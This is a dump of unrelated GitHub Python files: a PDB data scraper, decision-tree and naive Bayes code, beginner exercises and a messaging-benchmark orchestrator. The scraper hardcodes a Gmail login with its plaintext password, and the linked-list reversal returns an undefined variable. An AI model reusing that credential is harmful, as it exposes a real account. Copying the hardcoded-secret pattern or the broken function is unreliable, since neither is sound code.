arr_store[15]=ln[49:-15].rstrip() #\r\n continue\r\n if (\"MEAN B VALUE\" in ln):\r\n arr_store[16]=ln[49:-15].rstrip() #\r\n continue \r\n except urllib.error.HTTPError:\r\n pass\r\n except urllib.error.URLError:\r\n pass\r\n except IncompleteRead:\r\n pass\r\n else:\r\n pass\r\n time.sleep(1) \r\n return arr_store\r\n#----------------------------------------------------------------------------\r\nall_ids=pyb.get_all()\r\nindex_beg=20000 #5000\r\nindex_end=20200 #10000\r\nid_store=all_ids[index_beg:index_end] \r\nlen_pick=len(id_store)\r\npara_arr=np.full((len_pick,18), ' '*20)\r\npool = ThreadPool(4)\r\n#results = pool.map(read_url, id_store)\r\nwriter = pd.ExcelWriter(\"pdb_info_\" + str(index_beg) + \"_\" + str(index_end-1) + \".xlsx\")\r\nindex=0\r\nfor ele in pool.imap(read_url, id_store):\r\n para_arr[index,0]=index+index_beg\r\n para_arr[index,1:]=ele \r\n sys.stdout.write(\"\\r scrapping %d / %d\" %(index+1, len_pick))\r\n sys.stdout.flush()\r\n index=index+1\r\n if (index % 100 == 0) | (index == len_pick):\r\n \r\n df = pd.DataFrame(para_arr,columns=[\"ID_order\",\"ID\",\"Header\",\r\n \"Date\",\"a\",\"b\",\"c\",\"alpha\",\"beta\",\"gamma\",\r\n \"Space_Group\",\"Reso_High\",\"Reso_Low\",\"Sol_Cont\",\r\n \"Chain\",\"Num_Protein_Atom\",\"B_val_wilson\",\"B_val_overall\"])\r\n df.to_excel(writer, index=False,encoding='utf-8',sheet_name=\"foundID\") \r\n writer.save()\r\n time.sleep(1)\r\npool.close()\r\npool.join()\r\n#----------------------------------------------------------------------------\r\n#send remind email to when finished.\r\nreceiver = \"ycheng22@hotmail.com\"\r\nbody = \"job finished!_\"+ str(index_beg) + \"_to_\" + str(index_end-1) \r\n\r\nyag = yagmail.SMTP(user=\"ycheng2020@gmail.com\", password=\"15138065260cyp\", host='smtp.gmail.com')\r\nyag.send(\r\n to=receiver,\r\n subject=body,\r\n contents=body, \r\n)\r\n#----------------------------------------------------------------------------\r\ntoc = time.time()\r\nprint(\"\\n Time elapsed:\", toc - tic, \"seconds\") \r\n","repo_name":"ycheng22/Scrape_PDB_data_with_Python","sub_path":"scrap_pdb_improv_thread.py","file_name":"scrap_pdb_improv_thread.py","file_ext":"py","file_size_in_byte":4748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6753166280","text":"# 🚨 Don't change the code below 👇\nfrom turtle import pos\n\nrow1 = [\"⬜️\",\"⬜️\",\"⬜️\"]\nrow2 = [\"⬜️\",\"⬜️\",\"⬜️\"]\nrow3 = [\"⬜️\",\"⬜️\",\"⬜️\"]\nmap = [row1, row2, row3]\nprint(f\"{row1}\\n{row2}\\n{row3}\")\nposition = input(\"Where do you want to put the treasure? 
\")\n# 🚨 Don't change the code above 👆\n\n#Write your code below this row 👇\n# convert_position = position.split(\",\")\n# toString = str(convert_position[0]) + (convert_position[1])\n# print(toString)\n\n# if toString == \"11\":\n# row1[0] = \" x\"\n# elif toString == \"12\":\n# row2[0] = \" x\"\n# elif toString == \"13\":\n# row3[0] = \" x\"\n# elif toString == \"21\":\n# row1[1] = \" x\"\n# elif toString == \"22\":\n# row2[1] = \" x\"\n# elif toString == \"23\":\n# row3[1] = \" x\"\n# elif toString == \"31\":\n# row1[2] = \" x\"\n# elif toString == \"32\":\n# row2[2] = \" x\"\n# elif toString == \"33\":\n# row3[2] = \" x\"\n# else:\n# print(\"\\nTry Again\\n\")\n\nhorizontal = int(position[0])\nvertical = int(position[1])\n\nselected_row = map[vertical -1]\nselected_row[horizontal -1] = \" X\"\n\nprint(f\"\\n{row1}\\n{row2}\\n{row3}\\n\")\n\n\n\n","repo_name":"johns-santos/python","sub_path":"basic_concepts/day_01-04/treasure_map.py","file_name":"treasure_map.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15311183526","text":"\"\"\"\r\nThe goal of this program is to implement ID3 algorithm for decision trees\r\nThe last column of the data set is treated as the class label \r\nThis program was written to find the decision tree structure of the car data set and write it into an xml format.\r\n\r\nFor data set descriptions : http://archive.ics.uci.edu/ml/datasets/Car+Evaluation\r\n\r\nFormat to execute the program:\r\n\r\npython calida_decisiontree.py --data \"D:\\car.csv\" --output \"D:\\car_output.xml\"\r\npython calida_decisiontree.py --data \"D:\\nursery.csv\" --output \"D:\\nursery_output.xml\"\r\n\r\n\"\"\"\r\n\r\nimport argparse \r\nimport pandas as pd\r\nimport numpy as np\r\nimport lxml\r\nfrom lxml import etree as etree\r\nimport math\r\nimport time\r\n\r\n#Function to take commandline inputs\r\ndef userInput():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--data\" , help=\"Data file location\")\r\n parser.add_argument(\"--output\", help=\"Optput file location\")\r\n\r\n args=parser.parse_args()\r\n \r\n inputFile = args.data\r\n outputFile = args.output\r\n\r\n return inputFile, outputFile\r\n\t\r\n#Function to find the entropy \r\ndef findEntropy(df):\r\n lastColumn = df.keys()[-1]\r\n uniqueValues = df[int(lastColumn)].value_counts().keys().tolist()\r\n countOfUniqueValues = df[int(lastColumn)].value_counts().tolist()\r\n total = len(df[lastColumn])\r\n sumOfEntropies = 0\r\n for i in range (len(countOfUniqueValues)):\r\n prob = countOfUniqueValues[i]/total\r\n entropy = -prob*math.log(prob,c)\r\n sumOfEntropies = sumOfEntropies + entropy\r\n return sumOfEntropies\r\n\t\r\n#Function to find the weighted sum of entropies for an attribute \r\ndef findSumOfWeightedEntropies(df,attribute):\r\n#Finding Proportions\r\n lastColumn = df.keys()[-1]\r\n uniqueValuesOfAttr = df[attribute].value_counts().keys().tolist()\r\n countOfUniqueValues = df[attribute].value_counts().tolist()\r\n total = len(df[attribute])\r\n #print(total)\r\n proportion = [i / total for i in countOfUniqueValues]\r\n\r\n #Finding unique values of target \r\n uniqueValuesOfTarget = df[lastColumn].value_counts().keys().tolist()\r\n\r\n #Finding count of each unique value in the attribute for each unique target label \r\n index = uniqueValuesOfAttr\r\n columns = df[lastColumn].value_counts().keys().tolist()\r\n df_count = pd.DataFrame(index=index, columns=columns)\r\n df_count = 
df_count.fillna(0) \r\n #df_count\r\n\r\n for i in range(len(df[attribute])):\r\n #aV = df[attribute].loc[i]\r\n #tV = df[lastColumn].iloc[i]\r\n aV = df[attribute].values[i]\r\n tV = df[lastColumn].values[i]\r\n \r\n \r\n df_count.loc[aV,tV] = int(df_count.loc[aV,tV])+1\r\n\r\n #print(df_count)\r\n\r\n #Finding sum of each unique value and appending it to the df_count dataframe\r\n df_count.loc[:,'sum'] = df_count.sum(numeric_only=True, axis=1)\r\n #print(df_count)\r\n\r\n #Calculating entropy of unique values in the attribute \r\n df_entcal = pd.DataFrame(index=index, columns=columns)\r\n df_entcal = df_entcal.fillna(0) \r\n #df_entcal\r\n\r\n for p in uniqueValuesOfAttr:\r\n for q in columns:\r\n prob = df_count.loc[p,q]/df_count.loc[p,'sum']\r\n if prob==0:\r\n df_entcal.loc[p,q] = 0 \r\n else:\r\n df_entcal.loc[p,q] = -prob*math.log(prob,c)\r\n\r\n #print(df_entcal)\r\n df_entcal.loc[:,'sum'] = df_entcal.sum(numeric_only=True, axis=1)\r\n #print(df_entcal)\r\n\r\n weights =[]\r\n for k in uniqueValuesOfAttr:\r\n weights.append(df_count.loc[k,'sum']/total)\r\n\r\n sumOfWeightedEntropies = 0 \r\n for k in range (len(weights)):\r\n sumOfWeightedEntropies = sumOfWeightedEntropies - weights[k]*df_entcal.iloc[k,-1]\r\n #print(sumOfWeightedEntropies)\r\n return sumOfWeightedEntropies\r\n\r\n#Function to find information gain for an attribute \r\ndef findInfoGain(df,attribute,treeEnt):\r\n weightedEntropies = findSumOfWeightedEntropies(df,attribute)\r\n infoGain = treeEnt + weightedEntropies\r\n return infoGain\r\n\t\r\n#Function to get the best attribute \r\ndef getBestAttribute(df,treeEnt):\r\n ig = []\r\n lastColumn = df.keys()[-1]\r\n for i in range (lastColumn):\r\n ig.append(findInfoGain(df,i,treeEnt))\r\n a = np.argmax(ig)\r\n #print(ig)\r\n return(a)\r\n\r\n#Recursive function for ID3 to find the next best attribute/ label\r\ndef id3(df,targetAttribute,bestAttribute,remainAttr,currentNode):\r\n #print(\"BestAttribute:\",bestAttribute)\r\n \r\n #count no. of unique labels in the target attribute\r\n from collections import Counter\r\n cnt = Counter(x for x in df[targetAttribute])\r\n \r\n #If there's only one label in the targetAttribute, means it is pure\r\n if len(cnt)==1:\r\n entu = findEntropy(df)\r\n #print(\"Test\",entu)\r\n \r\n else:\r\n # Get unique values of the best Attribute that will be the edges\r\n vals = df[bestAttribute].value_counts().keys().tolist()\r\n \r\n #Create sub data frames\r\n for i in vals:\r\n #print(i)\r\n df_sub = df.loc[df[bestAttribute]==i]\r\n \r\n subEntropy = findEntropy(df_sub)\r\n #print(subEntropy)\r\n\r\n \r\n if(subEntropy == 0):\r\n node = etree.SubElement(currentNode, \"node\",entropy=\"0.0\",feature=\"att{val}\".format(val=bestAttribute),value=i)\r\n node.text=df_sub.iloc[0,-1]\r\n else:\r\n bestA = getBestAttribute(df_sub,subEntropy)\r\n remainingAttributes = [i for i in remainAttr if i != bestA]\r\n #print(\"Next best attribute:\",bestA)\r\n node = etree.SubElement(currentNode, \"node\",entropy=str(subEntropy),feature=\"att{val}\".format(val=bestAttribute),value=i)\r\n id3(df_sub,cols-1,bestA,remainingAttributes,node)\r\n \r\n \r\nif __name__ ==\"__main__\":\r\n\r\n #start = time.perf_counter()\r\n \r\n #Commandline input from user\r\n inputFile, outputFile = userInput()\r\n\r\n df_car = pd.read_csv(inputFile,header=None)\r\n\r\n #Finding no. 
of class labels - this value is also used to compute entropy \r\n rows,cols = df_car.shape\r\n c = len(df_car[cols-1].value_counts().keys()) \r\n\r\n # Find Tree entropy \r\n treeEntropy = findEntropy(df_car)\r\n\r\n #Adding tree entropy to xml - \r\n root = etree.Element(\"tree\", entropy=str(treeEntropy)) \r\n\r\n #Finding the best attribute to start the decision tree\r\n bestAttr = getBestAttribute(df_car,treeEntropy)\r\n\r\n #Find remaining attributes - attributes that \r\n attributeNames = df_car.keys().tolist()\r\n attributeNames.remove(cols-1) #Removing the target column\r\n remainingAttributes = [i for i in attributeNames if i != bestAttr] #Removing the attribute chosen as the root node\r\n \r\n id3(df_car,cols-1,bestAttr,remainingAttributes,root)\r\n\r\n with open(outputFile, 'wb') as doc:\r\n doc.write(etree.tostring(root, pretty_print = True))\r\n \r\n #end = time.perf_counter()\r\n #print (\"Time taken : %.2gs\" % (end-start))\r\n\r\n","repo_name":"CalidaPereira/machine-learning-codes","sub_path":"Decision Tree/DecisionTree.py","file_name":"DecisionTree.py","file_ext":"py","file_size_in_byte":7122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74098543931","text":"import pandas as pd\nimport numpy as np\n \n# calculate each class probability \ndef compute_class_priors(df, groupAttr):\n result = {}\n \n groups = df.groupby(groupAttr)\n for group in groups:\n result[group[0]] = len(group[1]) / len(df)\n \n return result\n\n# calculate probabilities for given value in each class for each attribute\ndef compute_for_all_classes(data, groupAttr, attrs, new_example):\n result = {}\n groups = data.groupby(groupAttr)\n \n for group in groups:\n result[group[0]] = compute_for_all_attrs(group[1], attrs, new_example)\n \n return result\n\ndef compute_for_all_attrs(group, attrs, new_example):#attrs i new_example muszą miec taka sama kolejnosc atrybutow\n result = 1\n \n for attr in attrs:\n result *= compute_for_attr(group, attr, new_example[attr])\n\n return result\n \ndef compute_for_attr(group, attr, new_attr_value): \n attr_groups = group.groupby(attr)\n \n for attr_value in attr_groups:\n if attr_value[0] == new_attr_value:\n return (len(attr_value[1]) / len(group))\n \n return 0\n","repo_name":"pjakimow/ProbabilisticML","sub_path":"naive-bayes-classifier/probabilities.py","file_name":"probabilities.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21563499413","text":"while 1:\n def fib(n):\n if n==0 or n==1:\n return n\n else:\n return fib(n-1)+fib(n-2)\n num=input(\"Enter a positve number(number of terms)(enter nothing to quit):\")\n if num==\"\":\n print(\"Have a good day!\")\n break\n elif not num.isnumeric() or int(num)<0:\n print(\"enter a positive integer\")\n else:\n print(\"Fibonacci series:\")\n [print(fib(i)) for i in range(int(num))]\n","repo_name":"sandesh-prabhu/fibonacci-series-in-python","sub_path":"fibonacci_series.py","file_name":"fibonacci_series.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"70543597373","text":"import argparse\nimport inspect\nimport logging\nimport multiprocessing as mproc\nimport os\nimport sys\nfrom functools import partial\n\nfrom imsegm.utilities.data_io import update_path\nfrom imsegm.utilities.experiments import save_config_yaml\n\nsys.path += [os.path.abspath('.'), 
os.path.abspath('..')] # Add path to root\nfrom bpdl.data_utils import (\n add_image_binary_noise,\n add_image_fuzzy_pepper_noise,\n CSV_NAME_WEIGHTS,\n dataset_apply_image_function,\n dataset_binary_combine_patterns,\n dictionary_generate_atlas,\n DIR_MANE_SYNTH_DATASET,\n image_deform_elastic,\n image_transform_binary2fuzzy,\n)\n\nNB_WORKERS = int(mproc.cpu_count() * 0.7)\nDEFAULT_PATH_DATA = update_path('data_images')\nDEFAULT_PATH_APD = os.path.join(DEFAULT_PATH_DATA, DIR_MANE_SYNTH_DATASET)\nNAME_WEIGHTS = CSV_NAME_WEIGHTS\nNAME_CONFIG = 'config.yml'\nIMAGE_SIZE = {\n '2D': (64, 64),\n '3D': (16, 128, 128),\n}\nDATASET_TYPE = '2D'\nNB_SAMPLES = 50\nNB_ATM_PATTERNS = 4\nNOISE_BINARY = 0.03\nNOISE_FUZZY = 0.15\n\n\ndef aparse_params():\n \"\"\"\n SEE: https://docs.python.org/3/library/argparse.html\n :return obj:\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-p', '--path_out', type=str, required=False, default=DEFAULT_PATH_APD, help='path to the output dataset'\n )\n parser.add_argument(\n '--nb_samples', type=int, required=False, default=NB_SAMPLES, help='number of samples to be generated'\n )\n parser.add_argument(\n '--nb_patterns',\n type=int,\n required=False,\n default=NB_ATM_PATTERNS,\n help='number of atom. patterns in created dictionary'\n )\n parser.add_argument(\n '--image_size',\n type=int,\n required=False,\n nargs='+',\n default=IMAGE_SIZE[DATASET_TYPE],\n help='dimensions of generated images in axis Z, X, Y'\n )\n parser.add_argument(\n '--nb_workers', type=int, required=False, default=NB_WORKERS, help='number of processes in parallel'\n )\n args = parser.parse_args()\n assert len(args.image_size) == 2 or len(args.image_size) == 3, 'unsupported image dimension of %r' % args.image_size\n args.path_out = os.path.abspath(os.path.expanduser(args.path_out))\n return args\n\n\ndef view_func_params(frame=inspect.currentframe(), path_out=''):\n \"\"\" view function parameters\n\n :param frame:\n :param str path_out:\n :return dict:\n\n >>> view_func_params() # doctest: +ELLIPSIS\n {...}\n \"\"\"\n _, _, _, values = inspect.getargvalues(frame)\n logging.info('PARAMETERS: \\n%s', '\\n'.join('\"{}\": \\t {}'.format(k, values[k]) for k in values))\n if os.path.exists(path_out):\n save_config_yaml(os.path.join(path_out, NAME_CONFIG), values)\n return values\n\n\ndef generate_all(\n path_out=DEFAULT_PATH_APD,\n atlas_size=IMAGE_SIZE[DATASET_TYPE],\n nb_patterns=NB_ATM_PATTERNS,\n nb_samples=NB_SAMPLES,\n nb_workers=NB_WORKERS\n):\n \"\"\" generate complete dataset containing dictionary od patterns and also\n input binary / fuzzy images with geometrical deformation and random noise\n\n :param tuple(int,int) atlas_size:\n :param int nb_samples:\n :param int nb_patterns:\n :param str csv_name:\n :param str path_out: path to the results directory\n \"\"\"\n assert nb_patterns > 0, 'number of patterns has to be larger then 0'\n assert os.path.exists(os.path.dirname(path_out)), 'missing: %s' % os.path.dirname(path_out)\n if not os.path.exists(path_out):\n os.mkdir(path_out)\n view_func_params(inspect.currentframe(), path_out)\n _path_dir = lambda d: os.path.join(path_out, d)\n # im_dict = dictionary_generate_rnd_pattern()\n im_dict = dictionary_generate_atlas(path_out, im_size=atlas_size, nb_patterns=nb_patterns)\n assert len(im_dict) > 0, 'dictionary has contain at least one pattern'\n\n im_comb, df_weights = dataset_binary_combine_patterns(im_dict, _path_dir('datasetBinary_raw'), nb_samples)\n df_weights.to_csv(os.path.join(path_out, NAME_WEIGHTS))\n\n 
_warp_ds_apply = partial(dataset_apply_image_function, nb_workers=nb_workers)\n\n im_deform = _warp_ds_apply(im_comb, _path_dir('datasetBinary_deform'), image_deform_elastic)\n _warp_ds_apply(im_comb, _path_dir('datasetBinary_noise'), add_image_binary_noise, NOISE_BINARY)\n _warp_ds_apply(im_deform, _path_dir('datasetBinary_defNoise'), add_image_binary_noise, NOISE_BINARY)\n\n im_comb_prob = _warp_ds_apply(im_comb, _path_dir('datasetFuzzy_raw'), image_transform_binary2fuzzy, 0.5)\n im_def_prob = _warp_ds_apply(im_deform, _path_dir('datasetFuzzy_deform'), add_image_fuzzy_pepper_noise, 0.5)\n _warp_ds_apply(im_comb_prob, _path_dir('datasetFuzzy_noise'), add_image_fuzzy_pepper_noise, NOISE_FUZZY)\n _warp_ds_apply(im_def_prob, _path_dir('datasetFuzzy_defNoise'), add_image_fuzzy_pepper_noise, NOISE_FUZZY)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n logging.info('running...')\n\n params = aparse_params()\n generate_all(\n path_out=params.path_out,\n atlas_size=params.image_size,\n nb_patterns=params.nb_patterns,\n nb_samples=params.nb_samples,\n nb_workers=params.nb_workers\n )\n\n # test_Ellipse()\n\n logging.info('DONE')\n","repo_name":"Borda/pyBPDL","sub_path":"experiments/run_dataset_generate.py","file_name":"run_dataset_generate.py","file_ext":"py","file_size_in_byte":5208,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"28030127537","text":"# Use `urllib` to retrieve a document from a user-input URL, display up to 3000 characters, \n# and count the number of characters in the document (ignore header).\n\nimport urllib.request\n\nwhile True :\n url = input('Enter URL of file: ')\n try :\n fhandle = urllib.request.urlopen(url)\n except FileNotFoundError :\n yn = input('File not found. Would you like to try again? 
(y/n): ')\n if yn == 'y' :\n continue\n else :\n quit()\n break\n\nchar_count = 0\nspc_count = 0\nfor line in fhandle :\n line = line.decode().strip()\n # the line below shortens this: char_count = char_count + len(line)\n char_count += len(line)\n spc_count += line.count(' ')\n if char_count > 3000 : break\n print(line)\n\nprint(f'\\nNumber of characters in this document (maximum 3000): {char_count} (of which {spc_count} are spaces)')","repo_name":"macanneul/Python_for_Everybody","sub_path":"12.03_urllib_and_count.py","file_name":"12.03_urllib_and_count.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"3356465626","text":"\ndef ensure_binary(stream):\n try:\n return stream.buffer # Python 3\n except AttributeError:\n return stream # Python 2\n\ndef pw():\n from .protobuf import ENCODERS, encode_message\n import argparse, sys\n\n # hack parameters to allow defaulting first argument to 1\n field_number_present = True\n field_number = 1\n try:\n len(sys.argv) < 2 or sys.argv[1][0] == '-' or int(sys.argv[1])\n except ValueError:\n field_number_present = False\n\n parser = argparse.ArgumentParser(description='Write protobuf messages from low-level input')\n if field_number_present:\n parser.add_argument('field_number', type=int, default=field_number)\n parser.add_argument('data_type', choices=ENCODERS.keys(), default='bytes')\n parser.add_argument('values', nargs='*')\n\n args = parser.parse_args()\n\n if len(args.values) == 0:\n value = ensure_binary(sys.stdin).read()\n elif len(args.values) == 1:\n value = args.values[0]\n else:\n value = args.values\n\n if field_number_present:\n field_number = args.field_number\n\n msg = encode_message(field_number, args.data_type, value)\n ensure_binary(sys.stdout).write(msg)\n\n\ndef grpc_frame():\n from .grpc_frame import wrap_grpc_stream, encode_grpc_frame, \\\n unwrap_grpc_stream, pipe_unwrap_grpc_frame\n\n import argparse, sys\n\n parser = argparse.ArgumentParser(description='Wrap / unwrap protobufs to GRPC frames')\n parser.add_argument('command', choices=['wrap', 'unwrap'])\n parser.add_argument('--stream', action='store_true')\n parser.add_argument('--tag', type=int, default=1)\n #parser.add_argument('--wire_type', type=int, default=LENGTH_DELIM)\n\n args = parser.parse_args()\n\n in_stream = ensure_binary(sys.stdin)\n out_stream = ensure_binary(sys.stdout)\n\n if args.command == 'wrap':\n if args.stream:\n wrap_grpc_stream(in_stream, out_stream)\n else:\n out_stream.write(encode_grpc_frame(in_stream.read()))\n elif args.command == 'unwrap':\n if args.stream:\n unwrap_grpc_stream(in_stream, out_stream, args.tag)\n else:\n pipe_unwrap_grpc_frame(in_stream, out_stream)\n\n\ndef grpc_client():\n from .grpc_frame import encode_message, protobuf_stream_gen\n # pylint: disable=E0401\n import grpc\n\n def parse_args():\n import argparse\n\n parser = argparse.ArgumentParser(description='Simple binary GRPC client')\n parser.add_argument('-is', '--stream_request', action='store_true')\n parser.add_argument('-os', '--stream_response', action='store_true')\n parser.add_argument('--tag', type=int, default=1)\n parser.add_argument('url')\n\n return parser.parse_args()\n\n def mode_name(is_stream):\n if is_stream:\n return 'stream'\n return 'unary'\n\n def client(in_stream, out_stream, args):\n host, _, path = args.url.partition('/')\n\n channel = grpc.insecure_channel(host)\n\n # e.g. 
unary_stream\n mode = mode_name(args.stream_request) + '_' + mode_name(args.stream_response)\n\n passthrough = lambda x: x\n\n service = getattr(channel, mode)('/' + path,\n request_serializer=passthrough,\n response_deserializer=passthrough)\n\n if args.stream_request:\n req = protobuf_stream_gen(in_stream)\n else:\n req = in_stream.read()\n\n if args.stream_response:\n for item in service(req):\n out_stream.write(encode_message(args.tag, \"bytes\", item))\n else:\n out_stream.write(service(req))\n\n import sys\n args = parse_args()\n in_stream = ensure_binary(sys.stdin)\n out_stream = ensure_binary(sys.stdout)\n client(in_stream, out_stream, args)\n\ndef pw_decode():\n import json, sys\n from .proto_decoding import parse_stream_with_spec, parse_spec\n\n def parse_args():\n import argparse\n parser = argparse.ArgumentParser(description='Parse protobuf messages with minimal spec')\n parser.add_argument('spec', help=\"For example: 2:string,3:{2:float,4:[1:sfixed32]}\")\n parser.add_argument('--pretty', action='store_true')\n return parser.parse_args()\n\n args = parse_args()\n parsed = parse_stream_with_spec(ensure_binary(sys.stdin), parse_spec(args.spec))\n opts = { 'sort_keys': True }\n if args.pretty: opts['indent'] = 2\n print(json.dumps(parsed, **opts))\n","repo_name":"oseiskar/protowire","sub_path":"protowire/commandline.py","file_name":"commandline.py","file_ext":"py","file_size_in_byte":4435,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"3698544979","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n def reverseList(self, head: ListNode) -> ListNode:\n \"\"\"\n 1. Save the next element to tmp.\n 2. Set the previous elemennt to head.next. In the first loop, the previous element is NULL.\n 3. Set the current element to prev. In the secou¥nd loop, the current element will be the previous element.\n 4. 
Get the next element from tmp.\n \"\"\"\n tmp = None # next element\n prev = None # previous element\n while head != None:\n tmp = head.next\n head.next = prev\n prev = head\n head = tmp\n # ans = prev.next\n return ans\n\n\n# Entry point for debug\nif __name__ == \"__main__\":\n li = [1,2,3,4,5]\n root = ListNode()\n head = root\n for l in li:\n head.val = l\n head.next = ListNode()\n head = head.next\n s = Solution()\n s.reverseList(head=root)","repo_name":"HagaSpa/coding-problems","sub_path":"leetcode/reverse-linked-list/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24674282533","text":"from abc import ABCMeta, abstractmethod\nfrom os import path\n\n\nclass BusConf(object):\n \"\"\"Common class to modelize bus configuration.\"\"\"\n\n __metaclass__ = ABCMeta\n\n def __init__(self, conf):\n self.conf = conf\n self.transport = self.get_transport()\n\n @abstractmethod\n def get_listener(self, conf):\n pass\n\n @abstractmethod\n def get_transport(self):\n pass\n\n def to_dict(self):\n return self.conf\n\n\nclass RabbitMQConf(BusConf):\n\n def __init__(self, conf):\n super(RabbitMQConf, self).__init__(conf)\n\n def get_listener(self, **kwargs):\n \"\"\"Returns the listener for rabbitmq.\n :param kwargs:\n \"\"\"\n return {\n \"machine\": self.conf[\"machine\"],\n \"port\": self.conf[\"port\"]\n }\n\n def get_transport(self):\n return \"rabbit\"\n\n\nclass QdrConf(BusConf):\n\n def __init__(self, conf):\n super(QdrConf, self).__init__(conf)\n self.transport = \"amqp\"\n\n def get_listener(self, **kwargs):\n \"\"\"Returns the listener for qdr.\n\n This is where external client can connect to.\n The contract is that this kind of listener has the role \"normal\"\n and there is exactly one such listener per router\n :param kwargs:\n \"\"\"\n listeners = self.conf[\"listeners\"]\n listener = [l for l in listeners if l[\"role\"] == \"normal\"]\n return {\n \"machine\": listener[0][\"host\"],\n \"port\": listener[0][\"port\"]\n }\n\n def get_transport(self):\n return \"amqp\"\n\n\nclass OmbtAgent(object):\n \"\"\"Modelize an ombt agent.\"\"\"\n\n __metaclass__ = ABCMeta\n\n def __init__(self, **kwargs):\n # NOTE(msimonin): maybe use __getattr__ at some point\n self.agent_id = kwargs[\"agent_id\"]\n self.machine = kwargs[\"machine\"]\n self.control_agents = kwargs[\"control_agents\"]\n self.bus_agents = kwargs[\"bus_agents\"]\n self.timeout = kwargs[\"timeout\"]\n # generated\n self.agent_type = self.get_type()\n # docker\n self.detach = True\n self.topic = kwargs[\"topic\"]\n # calculated attr\n self.name = self.agent_id\n # where to log inside the container\n self.docker_log = \"/home/ombt/ombt-data/agent.log\"\n # where to log outside the container (mount)\n self.log = path.join(\"/tmp/ombt-data\", \"%s.log\" % self.agent_id)\n # the command to run\n self.command = self.get_command()\n\n def to_dict(self):\n d = self.__dict__\n d.update({\n \"control_agents\": [a.to_dict() for a in self.control_agents],\n \"bus_agents\": [a.to_dict() for a in self.bus_agents],\n })\n return d\n\n @abstractmethod\n def get_type(self):\n pass\n\n def generate_connections(self):\n connections = {}\n for agents, agent_type in zip([self.control_agents, self.bus_agents], [\"control\", \"url\"]):\n connection = []\n for agent in agents:\n listener = agent.get_listener()\n transport = agent.transport\n connection.append(\"{{ hostvars['%s']['ansible_' + control_network]['ipv4']['address'] 
}}:%s\" %\n (listener[\"machine\"], listener[\"port\"]))\n connections[agent_type] = \"%s://%s\" % (transport, \",\".join(connection))\n return \"--control %s --url %s\" % (connections[\"control\"], connections[\"url\"])\n\n def get_command(self):\n \"\"\"Build the command for the ombt agent.\n \"\"\"\n command = []\n command.append(\"--debug\")\n command.append(\"--unique\")\n command.append(\"--timeout %s \" % self.timeout)\n command.append(\"--topic %s \" % self.topic)\n command.append(self.generate_connections())\n command.append(self.get_type())\n # NOTE(msimonin): we don't use verbosity for client/server\n # if self.verbose:\n # command.append(\"--output %s \" % self.docker_log)\n return command\n\n\nclass OmbtClient(OmbtAgent):\n\n def get_type(self):\n return \"rpc-client\"\n\n\nclass OmbtServer(OmbtAgent):\n\n def __init__(self, **kwargs):\n self.executor = kwargs[\"executor\"]\n super(OmbtServer, self).__init__(**kwargs)\n\n def get_command(self):\n \"\"\"Build the command for the ombt server.\n \"\"\"\n command = super(OmbtServer, self).get_command()\n command.append(\"--executor %s\" % self.executor)\n return command\n\n def get_type(self):\n return \"rpc-server\"\n\n\nclass OmbtController(OmbtAgent):\n\n def __init__(self, **kwargs):\n self.timeout = kwargs[\"timeout\"]\n self.call_type = kwargs[\"call_type\"]\n self.nbr_calls = kwargs[\"nbr_calls\"]\n self.pause = kwargs[\"pause\"]\n self.length = kwargs[\"length\"]\n super(OmbtController, self).__init__(**kwargs)\n\n def get_type(self):\n return \"controller\"\n\n def get_command(self):\n \"\"\"Build the command for the ombt controller.\n \"\"\"\n command = super(OmbtController, self).get_command()\n # We always dump stat per agents\n command.append(\"--output %s\" % self.docker_log)\n command.append(self.call_type)\n command.append(\"--calls %s\" % self.nbr_calls)\n command.append(\"--pause %s\" % self.pause)\n command.append(\"--length %s\" % self.length)\n return \" \".join(command)\n","repo_name":"msimonin/ombt-orchestrator","sub_path":"orchestrator/ombt.py","file_name":"ombt.py","file_ext":"py","file_size_in_byte":5376,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"1314088572","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nReadlist utilities\n\"\"\"\n\nimport os.path as op\nimport sys\nimport re\nimport logging\nimport pandas as pd\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom matplotlib_venn import venn3, venn3_circles\n\ndef venn3_coord(args):\n fhi = open(args.fi, 'r')\n s1 = fhi.readline().strip().split(\",\")\n s2 = fhi.readline().strip().split(\",\")\n s3 = fhi.readline().strip().split(\",\")\n fhi.close()\n s1, s2, s3 = set(s1), set(s2), set(s3)\n v = venn3([s1, s2, s3], ('A','B','C'))\n fho1 = open(args.fo1, 'w')\n for xy, l in zip(v.centers, v.radii):\n x, y = xy\n fho1.write(\"%s\\t%s\\t%s\\n\" % (x, y, l))\n fho1.close()\n fho2 = open(args.fo2, 'w')\n for xyl in v.subset_labels:\n x, y = xyl.get_position()\n l = xyl.get_text()\n fho2.write(\"%s\\t%s\\t%s\\n\" % (x, y, l))\n fho2.close()\n\ndef add_stat(args):\n cvt = {k: int for k in 'Replicate'.split()}\n sl = pd.read_csv(args.fi, sep=\"\\t\", header=0, 